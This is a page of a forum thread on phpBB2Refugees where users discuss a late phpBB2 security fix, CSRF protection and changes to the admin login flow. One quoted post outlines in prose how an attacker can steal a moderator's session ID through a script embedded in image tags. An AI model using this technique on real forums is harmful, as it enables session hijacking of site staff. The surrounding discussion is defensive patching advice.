phpBB2Refugees.com Logo
Not affiliated with or endorsed by the phpBB Group

Register •  Login 

Continue the legacy...

Welcome to all phpBB2 Refugees!Wave Smilie

This site is intended to continue support for the legacy 2.x line of the phpBB2 bulletin board package. If you are a fan of phpBB2, please, by all means register, post, and help us out by offering your suggestions. We are primarily a community and support network. Our secondary goal is to provide a phpBB2 MOD Author and Styles area.

The Final phpBB 2 Security Vulnerability
1 members found this topic helpful
Goto page Previous  1, 2, 3 ... 11, 12, 13, 14  Next
 
Search this topic... | Search phpBB2 Discussion... | Search Box
Register or Login to Post    Index » phpBB2 Discussion  Previous TopicPrint TopicNext Topic
Author Message
Slackervaara
Board Member



Joined: 01 Jan 2009

Posts: 70



PostPosted: Tue Aug 10, 2010 1:08 am 
Post subject: Re: The Final phpBB 2 Security Error

Does the Firefox add on RefControl offer any protection against this type of hack attempt?
Back to top
Acaria
Board Member



Joined: 20 Feb 2009

Posts: 238



PostPosted: Tue Aug 10, 2010 12:22 pm 
Post subject: Re: The Final phpBB 2 Security Error

Very possible. I haven't used it but I know it does something with the HTTP referrers, which is exactly what is involved in a CSRF attack.
Back to top
ABDev
Board Member



Joined: 01 Jun 2009

Posts: 76


flag
PostPosted: Tue Aug 10, 2010 12:31 pm 
Post subject: Re: The Final phpBB 2 Security Error

Acaria wrote:
Let's say you want to hack a board. You write a simple script to take the full URL in the browser of the attacked victim. You put it in the [img][/img] tags which loads the script to the page, allowing it to do it's intended effect. To do real damage, you post this in a thread you know will be locked. You know, some kind of random spam. When a Mod (or if they're lucky, and Admin) locks the thread, he is sent back to the thread displaying his current SID in the URL. This URL is sent to the hacker through his script, so he has the guy's SID.


Ok, I understand now that exploit works. It's an include type issue.
I'm going to look if there's not a better solution than the fixes of the SVN.
Thanks icon_smile.gif.
Back to top
Salvatos
Board Member



Joined: 19 Feb 2009

Posts: 449
Location: Québec


flag
PostPosted: Tue Aug 10, 2010 2:12 pm 
Post subject: Re: The Final phpBB 2 Security Error

Acaria wrote:
*facepalm*

Thank you DogCow. I'll add these changes immediately! icon_smile.gif

Oh my, I dared not point this out earlier because I thought you were saying that the fix in this thread was ineffective icon_redface.gif icon_rolleyes.gif
Glad to know my board IS safe after all icon_surprised.gif
Back to top
drathbun
Board Member



Joined: 24 Jul 2008

Posts: 729
Location: Texas


flag
PostPosted: Tue Aug 10, 2010 8:00 pm 
Post subject: Re: The Final phpBB 2 Security Error

First of all, I would submit that this is just yet another reason to never log on to your board as Admin unless you need to do actual admin things. Second, even if an admin SID gets stolen, unless that admin has logged in to the admin control panel and re-authenticated the session is not authorized to do that. The would-be hacker would be forced to reauth and if they don't know the admin password, they're locked out of the admin panel. Third, it's a simple matter to put an additional layer of security on the admin panel using .htaccess rules.

None of this addresses moderator exposure, of course. But there are other options either in place or available that can help protect your administrator options.

_________________
phpBBDoctor Blog
Back to top
JLA
Board Member



Joined: 30 Apr 2009

Posts: 451
Location: U.S.A


flag
PostPosted: Wed Sep 28, 2011 12:13 am 
Post subject: Re: The Final phpBB 2 Security Error

Question about the .23 to .24 changes. Are you required to twice click on the admin link to gain access. Once prior to PW entry and once after?
_________________
http://www.jlaforums.com
Back to top
Salvatos
Board Member



Joined: 19 Feb 2009

Posts: 449
Location: Québec


flag
PostPosted: Wed Sep 28, 2011 10:55 am 
Post subject: Re: The Final phpBB 2 Security Error

You mean to get to the control panel? You click Go to admin panel, then you "log in", then you're redirected to the ACP.
Back to top
JLA
Board Member



Joined: 30 Apr 2009

Posts: 451
Location: U.S.A


flag
PostPosted: Wed Sep 28, 2011 11:58 am 
Post subject: Re: The Final phpBB 2 Security Error

Salvatos wrote:
You mean to get to the control panel? You click Go to admin panel, then you "log in", then you're redirected to the ACP.


What I mean is this

Prior to .23 to .24 update

* Admin logs into site via login screen - after login is redirected to last place or index depending on how/when logged in
* Admin clicks admin link - is redirected to login screen
* Admin logs in again and is redirected to admin panel


After .23 to .24 update

* Admin logs into site via login screen - after login is redirected to last place or index depending on how/when logged in.
* Admin clicks admin link - is redirected to login screen
* Admin logs in again and is redirected to index
* Admin clicks admin link and is directed to admin panel
(Notice that after third step - sid shows then after forth step PID shows)

[/list]

_________________
http://www.jlaforums.com
Back to top
Dog Cow
Board Member



Joined: 18 Nov 2008

Posts: 378


flag
PostPosted: Thu Sep 29, 2011 11:21 am 
Post subject: Re: The Final phpBB 2 Security Error

Yes, this modification changes how the admin panel works. Examine the changes for sessions.php to see how (diff in my first post).
_________________
Moof!
Lincoln's Tomb, Oak Ridge Cemetery, Springfield ILMac 512K BlogMac GUI
Back to top
JLA
Board Member



Joined: 30 Apr 2009

Posts: 451
Location: U.S.A


flag
PostPosted: Thu Sep 29, 2011 12:39 pm 
Post subject: Re: The Final phpBB 2 Security Error

Dog Cow wrote:
Yes, this modification changes how the admin panel works. Examine the changes for sessions.php to see how (diff in my first post).


Thanks - just wanted to verify. Appreciate you putting together the change list from the code.!

_________________
http://www.jlaforums.com
Back to top
Dog Cow
Board Member



Joined: 18 Nov 2008

Posts: 378


flag
PostPosted: Mon Oct 10, 2011 6:24 pm 
Post subject: Re: The Final phpBB 2 Security Error

JLA wrote:
Dog Cow wrote:
Yes, this modification changes how the admin panel works. Examine the changes for sessions.php to see how (diff in my first post).


Thanks - just wanted to verify. Appreciate you putting together the change list from the code.!

Thank the appropriate developer from the phpBB team. I just posted the announcement here; I didn't write any of the code or make any of the diffs.

_________________
Moof!
Lincoln's Tomb, Oak Ridge Cemetery, Springfield ILMac 512K BlogMac GUI
Back to top
JLA
Board Member



Joined: 30 Apr 2009

Posts: 451
Location: U.S.A


flag
PostPosted: Fri Oct 14, 2011 9:09 pm 
Post subject: Re: The Final phpBB 2 Security Error

Dog Cow wrote:
JLA wrote:
Dog Cow wrote:
Yes, this modification changes how the admin panel works. Examine the changes for sessions.php to see how (diff in my first post).


Thanks - just wanted to verify. Appreciate you putting together the change list from the code.!

Thank the appropriate developer from the phpBB team. I just posted the announcement here; I didn't write any of the code or make any of the diffs.


Didn't you put the code change list together?

_________________
http://www.jlaforums.com
Back to top
Dog Cow
Board Member



Joined: 18 Nov 2008

Posts: 378


flag
PostPosted: Sat Oct 15, 2011 3:35 pm 
Post subject: Re: The Final phpBB 2 Security Error

JLA wrote:
Dog Cow wrote:
JLA wrote:
Dog Cow wrote:
Yes, this modification changes how the admin panel works. Examine the changes for sessions.php to see how (diff in my first post).


Thanks - just wanted to verify. Appreciate you putting together the change list from the code.!

Thank the appropriate developer from the phpBB team. I just posted the announcement here; I didn't write any of the code or make any of the diffs.


Didn't you put the code change list together?

No. I just wrote the first post. The code changes were done automatically by software.

_________________
Moof!
Lincoln's Tomb, Oak Ridge Cemetery, Springfield ILMac 512K BlogMac GUI
Back to top
JLA
Board Member



Joined: 30 Apr 2009

Posts: 451
Location: U.S.A


flag
PostPosted: Sat Oct 15, 2011 9:31 pm 
Post subject: Re: The Final phpBB 2 Security Error

Dog Cow wrote:
JLA wrote:
Dog Cow wrote:
JLA wrote:
Dog Cow wrote:
Yes, this modification changes how the admin panel works. Examine the changes for sessions.php to see how (diff in my first post).


Thanks - just wanted to verify. Appreciate you putting together the change list from the code.!

Thank the appropriate developer from the phpBB team. I just posted the announcement here; I didn't write any of the code or make any of the diffs.


Didn't you put the code change list together?

No. I just wrote the first post. The code changes were done automatically by software.


Oh, ok. Interesting to know. What is the software that generates this? What does it compare to root directories and generate the change?

_________________
http://www.jlaforums.com
Back to top
Dog Cow
Board Member



Joined: 18 Nov 2008

Posts: 378


flag
PostPosted: Sun Oct 16, 2011 3:49 pm 
Post subject: Re: The Final phpBB 2 Security Error

JLA wrote:
Dog Cow wrote:
JLA wrote:
Dog Cow wrote:
JLA wrote:
Dog Cow wrote:
Yes, this modification changes how the admin panel works. Examine the changes for sessions.php to see how (diff in my first post).


Thanks - just wanted to verify. Appreciate you putting together the change list from the code.!

Thank the appropriate developer from the phpBB team. I just posted the announcement here; I didn't write any of the code or make any of the diffs.


Didn't you put the code change list together?

No. I just wrote the first post. The code changes were done automatically by software.


Oh, ok. Interesting to know. What is the software that generates this?
On Unix and Linux systems, it's called diff.
_________________
Moof!
Lincoln's Tomb, Oak Ridge Cemetery, Springfield ILMac 512K BlogMac GUI
Back to top
Display posts from previous:   
Register or Login to Post    Index » phpBB2 Discussion  Previous TopicPrint TopicNext Topic
Page 12 of 14 All times are GMT - 4 Hours
Goto page Previous  1, 2, 3 ... 11, 12, 13, 14  Next
 
Jump to:  

Index • About • FAQ • Rules • Privacy • Search •  Register •  Login 
Not affiliated with or endorsed by the phpBB Group
Powered by phpBB2 © phpBB Group
Generated in 0.0623 seconds using 16 queries. (SQL 0.0113 Parse 0.0011 Other 0.0499)
phpBB Customizations by the phpBBDoctor.com
Template Design by DeLFlo and MomentsOfLight.com Moments of Light Logo